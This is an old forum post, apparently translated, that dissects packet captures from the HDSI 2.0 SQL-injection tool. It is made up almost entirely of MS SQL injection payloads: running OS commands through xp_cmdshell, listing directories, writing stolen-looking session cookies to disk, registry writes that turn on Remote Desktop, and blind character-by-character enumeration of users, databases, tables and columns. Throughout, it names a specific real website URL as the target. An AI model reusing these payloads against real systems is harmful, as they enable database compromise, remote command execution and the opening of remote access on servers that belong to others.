HDSI 2.0 SQL injection: packet-capture analysis of some statements

王朝delphi · Author: Anonymous   2006-01-09


Restoring cmd

;insert tb1 exec master..xp_cmdshell'net user '--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

Executing a command:

sql: ;ipconfig -all--

dos:

;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "ipconfig -all"--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

Listing a directory:

Directory c:, temporary table jiaozhu

;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu EXEC MASTER..XP_dirtree "c:",1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

Uploading a file:

Local path: C:\Inetpub\wwwroot\cook.txt   Save location: c:

Database stored procedure:

;exec master..xp_cmdshell ' echo cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%20cdb_visitedfid=12;%20cdb_oldtopics=D8D>c:\'--

Database backup: (delete the temporary table after the upload)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values(' echoStr ')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

Enabling 3389:

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

Injection analysis: numeric type; SQL error messages: off; access: on

Keyword used: 宝石公园“你玩 我抽”中奖名单公布

http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

Stacked queries: supported

Subqueries: supported

Privileges: public

Current user: dbo

Current database: event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1

And 1=2

And (Select Count(1) from SYSObjects)>0

and (select len(user))<32

;declare @a int--

And (IS_SRVROLEMEMBER('sysadmin'))=1

And (IS_MEMBER('db_owner'))=1

and (select len(user))<16

and (select len(user))<4

and (select len(user))<2

and (select len(user))<3

and (select len(user))<3

and (select len(user))<4

and (select ascii(substring(user,1,1)))<80

and (select ascii(substring(user,2,1)))<80

and (select ascii(substring(user,3,1)))<80

and (select ascii(substring(user,1,1)))<104

and (select ascii(substring(user,2,1)))<104

and (select ascii(substring(user,3,1)))<104

and (select ascii(substring(user,1,1)))<92

and (select ascii(substring(user,2,1)))<92

and (select ascii(substring(user,3,1)))<116

and (select ascii(substring(user,1,1)))<98

...

...

...

and (select len(db_name()))<16

and (select len(db_name()))<8

and (select len(db_name()))<4

...

...

...

and (select ascii(substring(db_name(),1,1)))<80

and (select ascii(substring(db_name(),2,1)))<80

and (select ascii(substring(db_name(),5,1)))<85

Cross-database:

Guessing database names:

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7

...

...

...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <104

and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <104

...

...

...

and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5

master: no sa privileges, so cross-database access is not possible

Guessing table names:

EventCategory

GET

and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

Guessing column names:

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62

and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory' order by A.name desc) T order by name asc )<35
